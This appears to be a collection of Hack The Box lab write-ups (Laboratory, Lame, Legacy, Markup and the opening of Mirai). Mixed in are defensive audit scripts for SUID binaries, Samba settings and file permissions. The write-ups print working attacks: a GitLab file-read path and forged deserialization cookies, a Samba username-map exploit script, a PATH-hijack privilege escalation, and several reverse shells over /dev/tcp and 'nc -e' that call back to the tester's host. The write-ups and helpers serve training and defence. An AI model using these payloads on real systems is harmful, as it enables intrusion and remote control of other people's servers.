/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/01/21 16:03:32 Finished
===============================================================
```

However, gobuster only discovers the typical standard directories. After investigating them, I still have no idea where to go from here. So I ran the nmap scan again, this time with basic scripts activated.

In addition to the previous output, we also get more information about the domain.

```
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
```

So apparently, there is also a subdomain called `git.laboratory.htb`.
Let's add it to the hosts file and check it out.

### Examine Port 443 - Subdomain

![](pics/git_server.png)

Looking at the subdomain, we can see a GitLab server login page. As we don't have any credentials, the only possible way is to create an account.

After creating an account (with a laboratory.htb email address), we have access to GitLab.

![](pics/git_logged_in.png)

Browsing through the available projects, we quickly find the "SecureWebsite" project.

![](pics/project.png)

However, the project does not give any valuable information. At least nothing that we do not already know. What about software issues in the server itself? Let's find out what version the server is.

A quick Google search reveals that we can get the server version by navigating to `https://your.domain.name/help`, so `https://git.laboratory.htb/help` in our case.

![](pics/help.png)

Server version 12.8.1. Now let's see if this specific version has any security flaws. And indeed! Searching for this version results in hundreds of hits for "File Read Remote Code Execution".

*This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that GitLab uses internally for A/B testing. Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above when the vulnerable `experimentation_subject_id` cookie was introduced. Tested on GitLab 12.8.1 and 12.4.0. (https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_file_read_rce/)*

A detailed article about the vulnerability can be found [here](https://hackerone.com/reports/827052).

## Gaining an Initial Foothold

We can simply follow the instructions of the CVE report.

It says that LFI is possible when including the file in an issue in one project and then moving the issue to another project. The specified file will then be included, as the LFI prevention apparently does not happen when moving issues.

So let's try if it works: we include /etc/passwd and create the issue in Project 1.

![](pics/issue.png)

Now we move the issue to Project 2.

![](pics/move_issue.png)

And indeed! We get access to the file! Amazing!

![](pics/vulnerability.png)

![](pics/etc_passwd.png)

In order to get RCE from the LFI, we first have to leak the `secrets.yml` file of the GitLab server. To do that we simply repeat the LFI steps as shown above with a different file included:

```
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
```

Perfect! Now that we have the secrets file, we can set up GitLab locally (this is not strictly necessary, but helps for the next steps).

I installed GitLab locally by following these steps:
1) Download GitLab: https://packages.gitlab.com/gitlab/gitlab-ce/packages/debian/stretch/gitlab-ce_12.8.10-ce.0_amd64.deb
2) `sudo dpkg -i download.deb`
3) `sudo gitlab-ctl reconfigure`

Afterwards, I replaced the secret key of my local `secrets.yml` file with the one from the leaked file.
Now we create a reverse shell script that should be uploaded to the GitLab server (don't forget to change the IP and the port):

Reverse shell:
```
└──╼ $ cat rev_shell.sh
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.26/4444 0>&1
```

Afterwards, start a local HTTP server.
```
sudo python3 -m http.server 8888
```

The next step is to open the `gitlab-rails console` and execute the following code. It will create a cookie that we can then inject as the `experimentation_subject_id`:
```
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar

erb = ERB.new("<%= `curl 10.10.14.26:8888/rev_shell.sh -o /tmp/rev_shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
```

Copy the output cookie and execute the following to upload the reverse shell to the GitLab server:

```
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHZha3p6IHdhcyBoZXJlID4gL3RtcC92YWt6emAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--256736af5cceb9bd73bbf17bfa3bf64985ac5767" -k
```

Afterwards, craft another cookie which contains the command to execute the script.

```
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar

erb = ERB.new("<%= `bash /tmp/rev_shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
```

Now set up a nc listener, copy the cookie and do the request:

```
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiWCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC90bXAvcmV2X3NoZWxsLnNoYCApLnRvX3MpOyBfZXJib3V0BjoGRUY6DkBlbmNvZGluZ0l1Og1FbmNvZGluZwpVVEYtOAY7CkY6E0Bmcm96ZW5fc3RyaW5nMDoOQGZpbGVuYW1lMDoMQGxpbmVub2kAOgxAbWV0aG9kOgtyZXN1bHQ6CUB2YXJJIgxAcmVzdWx0BjsKVDoQQGRlcHJlY2F0b3JJdTofQWN0aXZlU3VwcG9ydDo6RGVwcmVjYXRpb24ABjsKVA==--874f307ee34f95c27d0a9e79ba1900960d8d02e1" -k
```

This will execute the reverse shell and you have access to the server!

```
git@git:~/gitlab-rails/working$ hostname && id
git.laboratory.htb
uid=998(git) gid=998(git) groups=998(git)
```

After some minutes of exploring the server, I realized that the git server has nothing interesting hidden. At least no flags that we can submit to HTB. So now, we somehow have to gain access to the real server instead of just having access to the git server.

In the official [GitLab Docs](https://docs.gitlab.com/ee/administration/troubleshooting/navigating_gitlab_via_rails_console.html), they explain how to use the gitlab-rails console to find users, change passwords and save the changes to the live server.
We can use this to find existing users on the Gitlab server and then gain access to their accounts. Maybe they have some valuable information on their profiles. Let's follow the instructions of the docs. 194 | 195 | ``` 196 | irb(main):001:0> user = User.find(1) 197 | user = User.find(1) 198 | => # 199 | 200 | irb(main):002:0> user.password = 'password' 201 | user.password = 'password' 202 | => "password" 203 | 204 | irb(main):003:0> user.save 205 | user.save 206 | Enqueued ActionMailer::DeliveryJob (Job ID: 45e0541c-9976-41d5-a6da-02db29294bc7) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #> 207 | => true 208 | ``` 209 | 210 | Now going back to `git.laboratory.htb`, we can login as `dexter` with the password `password` 211 | 212 | ![](pics/dexter_gitlab.png) 213 | 214 | Going through his private respositories, we can find his private ssh key: 215 | 216 | ![](pics/dexter_sshkey.png) 217 | 218 | Using this, we can successfully login to his account on `laboratory.htb`. 219 | 220 | ``` 221 | dexter@laboratory:~$ hostname && id 222 | laboratory 223 | uid=1000(dexter) gid=1000(dexter) groups=1000(dexter) 224 | ``` 225 | 226 | ## Privilege Escalation 227 | 228 | We start by using the standard priv-esc techniques such as finding binaries with the SUID bit set. 229 | 230 | ``` 231 | find / -perm -4000 -type f 2>/dev/null 232 | 233 | /usr/local/bin/docker-security 234 | /usr/bin/sudo 235 | /usr/bin/newgrp 236 | /usr/bin/su 237 | ``` 238 | 239 | The binary `/usr/local/bin/docker-security` seems to be suspicious as it is usually not part of this list. So let's check it out. 240 | 241 | ``` 242 | -rwsr-xr-x 1 root dexter 16720 Aug 28 14:52 /usr/local/bin/docker-security 243 | ``` 244 | 245 | So our current user has permissions to execute it! Great. Let's do it and see what happens.... Nothing... hmm. Then we have to figure out what it does. 
But instead of reverse engineering it locally with some disassembler, we can start by running things like `ltrace` and `strace` to get a first idea of what is going on. 246 | 247 | ``` 248 | dexter@laboratory:/usr/local/bin$ ltrace docker-security 249 | setuid(0) = -1 250 | setgid(0) = -1 251 | system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted 252 | 253 | --- SIGCHLD (Child exited) --- 254 | <... system resumed> ) = 256 255 | system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted 256 | 257 | --- SIGCHLD (Child exited) --- 258 | <... system resumed> ) = 256 259 | +++ exited (status 0) +++ 260 | ``` 261 | 262 | Apparently, the binary uses `chmod`. The issue with this is, that it does not use the absolute path. So we can create our own `chmod` and inject it into the path: 263 | 264 | ``` 265 | dexter@laboratory:/tmp$ echo "/bin/bash" > chmod 266 | dexter@laboratory:/tmp$ chmod +x chmod 267 | dexter@laboratory:/tmp$ export PATH=.:${PATH} 268 | ``` 269 | 270 | Now when we run the binary, the `chmod` call will be replaced by our chmod file, which contains /bin/sh. Let's run it! 271 | 272 | ``` 273 | dexter@laboratory:/tmp$ /usr/local/bin/docker-security 274 | root@laboratory:/tmp# hostname && id 275 | laboratory 276 | uid=0(root) gid=0(root) groups=0(root),1000(dexter) 277 | ``` 278 | 279 | Perfect! We pwned the machine! 
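The two signals that gave this privilege escalation away (an unexpected SUID binary, and a `system()` call that resolves its program through `PATH`) are easy to check for mechanically. The following audit helper is an added example, not part of the writeup; the baseline of expected SUID binaries is constructed and illustrative, and the sample `find`/`ltrace` text is taken from the output shown above.

```python
"""Audit helpers for the SUID + PATH-lookup pattern seen in docker-security.

Added example, not part of the writeup. Sample inputs are constructed from the
find / ltrace output shown above; EXPECTED_SUID is an illustrative baseline
(build yours from a known-good image of the same distribution).
"""
import re
import shlex

# SUID binaries one expects on a stock Ubuntu host (illustrative baseline).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount",
}

# ltrace prints library calls like: system("chmod 700 /usr/bin/docker" ...
SYSTEM_CALL = re.compile(r'system\("([^"]*)"')


def unexpected_suid(find_output: str, baseline=EXPECTED_SUID) -> list:
    """Paths from `find / -perm -4000` output that are not in the baseline."""
    found = [ln.strip() for ln in find_output.splitlines() if ln.strip().startswith("/")]
    return sorted(p for p in found if p not in baseline)


def relative_system_calls(ltrace_output: str) -> list:
    """(program, full command) for every system() whose program has no slash,
    i.e. is looked up through the caller's PATH. A privileged binary should
    use an absolute path (or exec a fixed argv with a sanitised environment)."""
    findings = []
    for m in SYSTEM_CALL.finditer(ltrace_output):
        cmd = m.group(1)
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes in a truncated capture
            argv = cmd.split()
        if argv and "/" not in argv[0]:
            findings.append((argv[0], cmd))
    return findings


def audit(find_output: str, ltrace_output: str) -> list:
    """Human-readable findings from both checks."""
    report = [f"unexpected SUID binary: {p}" for p in unexpected_suid(find_output)]
    for prog, cmd in relative_system_calls(ltrace_output):
        report.append(f"system() resolves '{prog}' via PATH: {cmd!r}")
    return report


# Constructed samples (copied from the writeup's own output above).
SAMPLE_FIND = """find / -perm -4000 -type f 2>/dev/null

/usr/local/bin/docker-security
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/su
"""

SAMPLE_LTRACE = """setuid(0)                                        = -1
setgid(0)                                        = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++
"""

if __name__ == "__main__":
    for line in audit(SAMPLE_FIND, SAMPLE_LTRACE):
        print(line)
```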
--------------------------------------------------------------------------------
/Lame/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)
# Beginner Track - Lame

## Enumeration

```
rustscan 10.129.72.52 -- -sC -sV -o port_scan

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.50
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

So we have an open FTP port (21) with anonymous login allowed, an SSH port (22), open Samba ports (139, 445) and a distributed C/C++ compiler server (distcc) on port 3632.

## Examine Port 21 - Anonymous allowed

Connecting to the FTP server as the anonymous user works; however, the directory is completely empty.

```
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
```

## Examine Port 139/445

Let's start by enumerating the SMB shares.

```
└──╼ $ smbmap -H 10.129.72.52
[+] IP: 10.129.72.52:445	Name: 10.129.72.52
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	WORKGROUP LAME
```

Apparently we have full read and write access to the `tmp` share.

```
└──╼ $ smbclient //10.129.72.52/tmp
Enter WORKGROUP\ctf's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan  6 13:57:48 2021
  ..                                 DR        0  Sat Oct 31 08:33:58 2020
  .ICE-unix                          DH        0  Wed Jan  6 13:45:02 2021
  5571.jsvc_up                        R        0  Wed Jan  6 13:46:17 2021
  vmware-root                        DR        0  Wed Jan  6 13:45:29 2021
  .X11-unix                          DH        0  Wed Jan  6 13:45:30 2021
  .X0-lock                           HR       11  Wed Jan  6 13:45:30 2021
  vgauthsvclog.txt.0                  R     1600  Wed Jan  6 13:45:00 2021

		7282168 blocks of size 1024. 5385876 blocks available
```

After investigating all the files and finding nothing, I looked up whether there are any known vulnerabilities for this specific Samba version (3.0.20).

```
searchsploit samba 3.0.20
```

![](pics/searchsploit.png)

## Exploitation

The one we need is the "Username map script" exploit. There are two ways you can exploit this vulnerability: either with Metasploit, which runs the exploit without telling you what actually happens in the background, or manually, where you learn every single step. But that's totally up to you. I decided to try the manual approach.
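From the defender's side, the "username map script" weakness (CVE-2007-2447, explained in detail below) comes down to a client-controlled username reaching `/bin/sh` unfiltered. The following helpers are an added example, not part of the writeup or of Samba: they locate the directive in a constructed `smb.conf`, flag authentication log lines whose username carries shell metacharacters, and show how a mapping helper should be invoked instead (validated name, argv list, no shell). The log format and script path are constructed for the example.

```python
"""Defensive checks around Samba's "username map script" (CVE-2007-2447).

Added example, not from the writeup. The smb.conf fragment, the log lines and
the helper script path are constructed to show what the checks flag.
"""
import re
import shlex

# Only characters a POSIX account name may contain: anything else (backticks,
# semicolons, pipes, quotes, ...) must never reach a shell-interpolated line.
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
# Samba auth log line shape (constructed to match the Samba 3 message text).
LOG_USER_RE = re.compile(r"Authentication for user \[([^\]]*)\]")


def is_safe_username(name: str) -> bool:
    """Allowlist check on a client supplied username."""
    return bool(USERNAME_RE.match(name))


def audit_smb_conf(conf_text: str) -> list:
    """Return (section, value) for every 'username map script' directive.

    Samba runs that script through /bin/sh with the client supplied name
    inserted, so its presence on a pre-3.0.25 build is the condition the
    writeup exploits. Lines starting with '#' or ';' are comments.
    """
    section, findings = "global", []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, _, value = line.partition("=")
        if key.strip().lower().replace(" ", "") == "usernamemapscript":
            findings.append((section, value.strip()))
    return findings


def suspicious_logins(log_text: str) -> list:
    """Usernames in Samba auth log lines that fail the allowlist."""
    return [m.group(1) for m in LOG_USER_RE.finditer(log_text)
            if not is_safe_username(m.group(1))]


def safe_map_argv(script: str, username: str) -> list:
    """How a mapping helper should be invoked: validated name appended to a
    fixed argv (run with subprocess and shell=False), never interpolated
    into a shell string. Raises ValueError instead of passing a hostile name on."""
    if not is_safe_username(username):
        raise ValueError(f"rejected username: {username!r}")
    return shlex.split(script) + [username]


# Constructed samples.
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   ; mapping helper: this directive is the vulnerable setting
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""

SAMPLE_LOG = """[2021/01/06 13:50:01, 2] auth/auth.c:check_ntlm_password(319)
  check_ntlm_password:  Authentication for user [makis] -> [makis] FAILED with error NT_STATUS_WRONG_PASSWORD
[2021/01/06 13:50:09, 2] auth/auth.c:check_ntlm_password(319)
  check_ntlm_password:  Authentication for user [bob;id] -> [bob;id] FAILED with error NT_STATUS_NO_SUCH_USER
"""

if __name__ == "__main__":
    print("directives:", audit_smb_conf(SAMPLE_SMB_CONF))
    print("suspicious:", suspicious_logins(SAMPLE_LOG))
```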

Explanation of the vulnerability:

CVE-2007-2447 - Samba usermap script
Samba 3.0.0 - 3.0.25rc3 is subject to a remote command injection vulnerability (CVE-2007-2447) that allows remote attackers to execute arbitrary commands by specifying a username containing shell metacharacters.

The root cause is that unfiltered user input provided via MS-RPC calls is passed to /bin/sh when the non-default "username map script" configuration option in smb.conf is invoked, so no authentication is needed to exploit this vulnerability.

To exploit this vulnerability, all you need to do is change the username used for authentication to your payload in combination with `nohup`. I wrote a short Python script for that purpose.

```python
#!/usr/bin/env python3

import sys
from smb.SMBConnection import SMBConnection  # pysmb


def exploit(rhost, rport, lhost, lport):
    # The username itself carries the command; Samba hands it to /bin/sh
    # through the "username map script" option.
    payload = f'nc -e /bin/bash {lhost} {lport}'
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    err = conn.connect(rhost, rport)
    if not err:
        print("[+] Done !")


if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <rhost> <rport> <lhost> <lport>")
    else:
        print("[+] Connecting !")
        try:
            rhost = sys.argv[1]
            rport = int(sys.argv[2])
            lhost = sys.argv[3]
            lport = int(sys.argv[4])
            exploit(rhost, rport, lhost, lport)
        except ValueError:
            print("ERROR: Port must be an integer")
            exit(0)
```

Here we connect with the username set to our reverse shell payload.

```
└──╼ $ python3 exploit.py 10.129.72.52 139 10.10.14.50 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Done
```

This results in:

```
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.72.52] 43267
id
uid=0(root) gid=0(root)
```

An alternative would be to use smbclient to connect to the tmp share.

Afterwards type the following:

```
smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.50 4444`"
```
This is the manual approach without a script.

## Post Exploitation

Now we can obtain the user flag (/home/makis/user.txt) and the root flag (/root/root.txt).
--------------------------------------------------------------------------------
/Legacy/README.md:
--------------------------------------------------------------------------------

![](pics/logo.png)

# Legacy (Windows)

## Enumeration

```
rustscan 10.129.79.117 -- -sC -sV -o port_scan

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
|_nbstat: NetBIOS name: nil, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:41:6a (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-01-18T17:21:39+02:00
| smb-security-mode:
|   account_used:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

Both SMB ports, 139 & 445, are open. So this is again a machine with an SMB challenge/vulnerability.

By running the default nmap scripts (-sC), we can already see that it's a machine with a rather old OS (Windows XP with Windows 2000 LAN Manager). This might be the reason why this machine is called `Legacy`. Let's investigate that further.

## Exploitation

Googling for "`windows xp windows 2000 manager vulnerability`", we literally get hundreds of results all pointing towards `MS08-067 - Critical: Vulnerability in Server Service Could Allow Remote Code Execution`.

Using searchsploit, we also get a list of existing exploits for this vulnerability.

Therefore, I decided to use Metasploit to make things easier (this time at least).

![](pics/metasploit_ms08-067.png)

Metasploit already offers a module for this vulnerability. Let's use it!

Settings should be defined as follows (insert your IP into LHOST):

![](pics/module_options.png)

After executing the exploit, we receive a meterpreter shell:

![](pics/system_shell.png)

Now what's left is to obtain the user and root flag.
There are several ways to do that. I decided to go for the simple `shell` spawn and search for them manually.

## Post Exploitation

User Flag:
```
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
```

Root Flag:
```
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
```
--------------------------------------------------------------------------------
/Markup/README.md:
--------------------------------------------------------------------------------
# Starting Point - Markup

## Enumeration

```
rustscan 10.10.10.49 -- -sC -sV -o port_scan

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack
80/tcp  open  http    syn-ack
443/tcp open  https   syn-ack
```

### Examine Port 80 - Apache Server

![](pics/login.png)

When accessing the open port 80 via a browser, we can see a login page. In the previous machine (Included), we found the credentials `Daniel:>SNDv*2wzLWf` stored in an SQL dump. Using them, we can successfully log in and are redirected to the application's website, which seems to be some kind of online store / delivery service.
![](pics/delivery.png)

The website provides several functionalities, one of which is for submitting orders.

![](pics/order.png)

When submitting an order (with test data) and intercepting the request with Burp Suite, we can see that the content is XML.

![](pics/burp-order.png)

There is a good chance of an XXE (XML External Entity) vulnerability. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Let's try it:

![](pics/xxe_proof.png)

Perfect! It works.

Now what can we do? We know that there is an open SSH port. And we also know that `Daniel` is a valid user. Maybe we can leak the private SSH key and use it to connect to the server.

![](pics/ssh_key_leak.png)

Using this key as the identity file for the SSH connection, we get access to the machine!

```
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

daniel@MARKUP C:\Users\daniel>whoami
markup\daniel
```

## Exploitation

Enumerating the system reveals a script named `job.bat` located in the `C:\Log-Management` directory:

```
daniel@MARKUP C:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
```

Looking at the permissions, we see that the group `BUILTIN\Users` has full control (F) over the file. This also includes our current user daniel.

```
daniel@MARKUP C:\Log-Management>icacls job.bat
job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)
```

The idea is to replace the current code with a reverse shell, which will then be executed by an administrator (similar to cron jobs on Unix). But for that, we first must upload nc.exe so that we can establish a reverse shell.
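The root cause here is a script that a privileged scheduled task executes while `BUILTIN\Users` can modify it. Reviewing `icacls` output for that condition across many files is tedious by eye, so the following parser is an added example (not part of the writeup) that flags every ACE granting a write-capable right to a principal every local user belongs to. The sample output is constructed from the `job.bat` listing above plus one correctly permissioned file, and it assumes file names without spaces on the first line of each block.

```python
"""Flag scripts that low-privilege principals can modify, from icacls output.

Added example, not part of the writeup. SAMPLE_ICACLS is constructed: the
job.bat block matches the listing above, cleanup.bat is a correctly
permissioned counterpart. Assumes file names without spaces on the first
line of each block (icacls prints the name only there).
"""
import re

# Principals that any local user effectively belongs to.
LOW_PRIV = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# Simple and granular icacls rights that let the holder change the file or
# its ACL/owner (granular list abbreviated to the ones that matter here).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "DE"}
# Inheritance / propagation flags that carry no permission by themselves.
FLAGS = {"I", "OI", "CI", "IO", "NP"}

# "<principal>:(flag)(right)..." e.g. NT AUTHORITY\SYSTEM:(I)(F)
ACE_RE = re.compile(r"^(?P<principal>[^:()]+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(output: str) -> list:
    """(file, principal, rights) tuples from icacls text output."""
    entries, current = [], None
    for raw in output.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("Successfully") or line.startswith("Failed"):
            continue
        if not line[0].isspace():
            # New file block: "<file> <principal>:<rights>"
            current, _, line = line.partition(" ")
        m = ACE_RE.match(line.strip())
        if m and current is not None:
            entries.append((current, m.group("principal").strip(), m.group("rights")))
    return entries


def rights_tokens(rights: str) -> set:
    """Split "(I)(RX,W)" into {"I", "RX", "W"}."""
    tokens = set()
    for group in re.findall(r"\(([^)]*)\)", rights):
        tokens.update(t.strip() for t in group.split(",") if t.strip())
    return tokens


def writable_by_low_priv(output: str) -> list:
    """Files where a low-privilege principal holds a write-capable right.

    Remediation for a hit is to strip that grant (icacls <file> /remove:g
    <principal>) and re-check what the scheduled task actually runs.
    """
    findings = []
    for path, principal, rights in parse_icacls(output):
        perms = rights_tokens(rights) - FLAGS
        if principal in LOW_PRIV and perms & WRITE_RIGHTS:
            findings.append((path, principal, rights))
    return findings


SAMPLE_ICACLS = r"""job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

C:\Log-Management\cleanup.bat NT AUTHORITY\SYSTEM:(I)(F)
                              BUILTIN\Administrators:(I)(F)
                              BUILTIN\Users:(I)(RX)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, rights in writable_by_low_priv(SAMPLE_ICACLS):
        print(f"{path}: {who} has {rights}")
```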

```
curl http://10.10.14.15/nc.exe -o c:\users\daniel\nc.exe

echo C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.15 4444 > C:\Log-Management\job.bat
```

Now we wait and eventually receive a root shell:

![](pics/rootshell.png)

The final step is to obtain the root flag: `f574a3e7650cebd8c39784299cb570f8`
--------------------------------------------------------------------------------
/Mirai/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Mirai (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.82.32 -- -sV -o port_scan

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp    open  domain  syn-ack dnsmasq 2.76
80/tcp    open  http    syn-ack lighttpd 1.4.35
1879/tcp  open  upnp    syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    syn-ack Plex Media Server httpd
32469/tcp open  upnp    syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Examine Port 80 - lighttpd Server

Accessing port 80 via the browser leaves us with an empty page. Using gobuster, we discover an interesting directory as well as a JavaScript file.

```
└──╼ $ gobuster dir -u "10.129.82.32" -w /usr/share/wordlists/dirb/common.txt
===============================================================
